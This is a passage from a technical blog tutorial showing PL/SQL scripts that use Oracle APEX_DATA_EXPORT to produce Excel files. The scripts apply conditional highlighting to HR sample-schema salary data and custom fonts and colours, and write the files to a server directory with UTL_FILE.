    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
    
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
        
    utl_file.fclose( v_fh);

    dbms_output.put_line('File written to HR_REPORTS');
    
exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/
       

When we run this, we now get a row count row at the bottom of the file :

Highlighting cells and rows

The ADD_HIGHLIGHT procedure allows us to apply conditional formatting to individual cells, or even entire rows.
Once again the values to determine this behaviour need to be included in the report query.
In this case, we specify a highlight_id value to be used in rendering the row.

This time, I have a new query and I want to apply formatting based on the value of the SALARY column.
If the value is below 6000 then I want to make the text red ( by applying highlight_id 1).
Otherwise, I want to set the background colour to green for the entire row ( highlight_id 2).
The query therefore is this :

select first_name, last_name, salary,
    case when salary < 6000 then 1 else 2 end as fair_pay
from employees
where job_id = 'IT_PROG'

Highlight 1 is :

    -- text in red for id 1
    apex_data_export.add_highlight(
        p_highlights => v_highlights,
        p_id => 1,
        p_value_column => 'FAIR_PAY',
        p_display_column => 'SALARY',
        p_text_color => '#FF0000' );    

…and highlight 2 is :

    -- Whole row with green background for id 2
    apex_data_export.add_highlight
    (
        p_highlights => v_highlights,
        p_id => 2,
        p_value_column => 'FAIR_PAY',
        p_text_color => '#000000', -- black
        p_background_color => '#00ffbf' -- green
    );

The finished script is excel_highlight.sql :

set serverout on size unlimited
clear screen

declare

    cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    
    v_highlights apex_data_export.t_highlights;    
    
    v_context apex_exec.t_context;
    v_export apex_data_export.t_export;
    
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'programmer_pay.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
    
begin

    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike' 
    );
    
    
    -- Add a row with a count of the records in the file
    -- We need to add the relevant data to the query and then format it
    v_stmnt := 
        q'[select first_name, last_name, salary,
            case when salary < 6000 then 1 else 2 end as fair_pay
        from employees
        where job_id = 'IT_PROG']';

    -- text in red for id 1
    apex_data_export.add_highlight(
        p_highlights => v_highlights,
        p_id => 1,
        p_value_column => 'FAIR_PAY',
        p_display_column => 'SALARY',
        p_text_color => '#FF0000' );    
    
    -- Whole row with green background for id 2
    apex_data_export.add_highlight
    (
        p_highlights => v_highlights,
        p_id => 2,
        p_value_column => 'FAIR_PAY',
        p_text_color => '#000000', -- black
        p_background_color => '#00ffbf' -- green
    );
    
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    


    -- Pass the highlights object into the export
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx,
        p_highlights => v_highlights 
    );
    
    apex_exec.close( v_context);
    
    v_length := dbms_lob.getlength( v_export.content_blob);
    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
    
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
        
    utl_file.fclose( v_fh);
    dbms_output.put_line('File written to HR_REPORTS');

exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/

…and the output…

Formatting with GET_PRINT_CONFIG

The GET_PRINT_CONFIG function offers a plethora of document formatting options…and a chance for me to demonstrate that I’m really more of a back-end dev.

To demonstrate just some of the available options, I have :

  • changed the header and body font family to Times (default is Helvetica)
  • set the heading text to be White and bold
  • set the header background to be Dark Slate Gray ( or Grey, if you prefer)
  • set the body background to be Turquoise
  • set the body font colour to be Midnight Blue

All of which looks like this :

v_print_config := apex_data_export.get_print_config
(
    p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
    p_header_font_weight => apex_data_export.c_font_weight_bold, --  Default is "normal"
    p_header_font_color => '#FFFFFF', -- White
    p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
    p_body_font_family => apex_data_export.c_font_family_times,
    p_body_bg_color => '#40E0D0', -- Turquoise
    p_body_font_color => '#191970' -- MidnightBlue
);        

Note that, according to the documentation, GET_PRINT_CONFIG will also accept HTML colour names or RGB codes.
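
So, assuming the documentation is to be believed, the same settings could be expressed a little more readably with colour names ( a sketch I haven’t exhaustively tested) :

-- same colours as before, using HTML colour names (untested sketch)
v_print_config := apex_data_export.get_print_config
(
    p_header_font_family => apex_data_export.c_font_family_times,
    p_header_font_weight => apex_data_export.c_font_weight_bold,
    p_header_font_color => 'white',
    p_header_bg_color => 'darkslategray',
    p_body_font_family => apex_data_export.c_font_family_times,
    p_body_bg_color => 'turquoise',
    p_body_font_color => 'midnightblue'
);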

Anyway, the script is called excel_print_config.sql :

set serverout on size unlimited
clear screen

declare
        cursor c_apex_app is
        select ws.workspace_id, ws.workspace, app.application_id, app.page_id
        from apex_application_pages app
        inner join apex_workspaces ws
            on ws.workspace = app.workspace
        order by page_id;    

    v_apex_app c_apex_app%rowtype;    
   
    v_stmnt varchar2(32000);
    
    v_context apex_exec.t_context;
   
    v_print_config apex_data_export.t_print_config;
    v_export apex_data_export.t_export;    

    -- File handling variables
    v_dir all_directories.directory_name%type := 'HR_REPORTS';
    v_fname varchar2(128) := 'crayons.xlsx';

    v_fh utl_file.file_type;
    v_buffer raw(32767);
    v_amount integer := 32767;
    v_pos integer := 1;
    v_length integer;
begin


    open c_apex_app; 
    fetch c_apex_app into v_apex_app;
    close c_apex_app;
    
    apex_util.set_workspace(v_apex_app.workspace);
    
    apex_session.create_session
    (
        p_app_id => v_apex_app.application_id,
        p_page_id => v_apex_app.page_id,
        p_username => 'anynameyoulike'
    );

    v_stmnt := 'select * from departments';
    
    v_context := apex_exec.open_query_context
    (
        p_location => apex_exec.c_location_local_db,
        p_sql_query => v_stmnt
    );    
    
    -- Let's do some formatting.
    -- OK, let's just scribble with the coloured crayons...
    v_print_config := apex_data_export.get_print_config
    (
        p_header_font_family => apex_data_export.c_font_family_times, -- Default is "Helvetica"
        p_header_font_weight => apex_data_export.c_font_weight_bold, --  Default is "normal"
        p_header_font_color => '#FFFFFF', -- White
        p_header_bg_color => '#2F4F4F', -- DarkSlateGrey/DarkSlateGray
        p_body_font_family => apex_data_export.c_font_family_times,
        p_body_bg_color => '#40E0D0', -- Turquoise
        p_body_font_color => '#191970' -- MidnightBlue
    );        

    -- Specify the print_config in the export
    v_export := apex_data_export.export
    (
        p_context => v_context,
        p_format => apex_data_export.c_format_xlsx,
        p_print_config => v_print_config
    );
    
    apex_exec.close( v_context);
    
    v_length := dbms_lob.getlength( v_export.content_blob);
    v_fh := utl_file.fopen( v_dir, v_fname, 'wb', 32767);
    
    while v_pos <= v_length loop
        dbms_lob.read( v_export.content_blob, v_amount, v_pos, v_buffer);
        utl_file.put_raw(v_fh, v_buffer, true);
        v_pos := v_pos + v_amount;
    end loop;
    
    utl_file.fclose( v_fh);

    dbms_output.put_line('File written to HR_REPORTS');
    
exception when others then
    dbms_output.put_line(sqlerrm);
    if utl_file.is_open( v_fh) then
        utl_file.fclose(v_fh);
    end if;    
end;
/    

…and the resulting file is about as garish as you’d expect…

On the off-chance that you might prefer a more subtle colour scheme, you can find a list of HTML colour codes here.
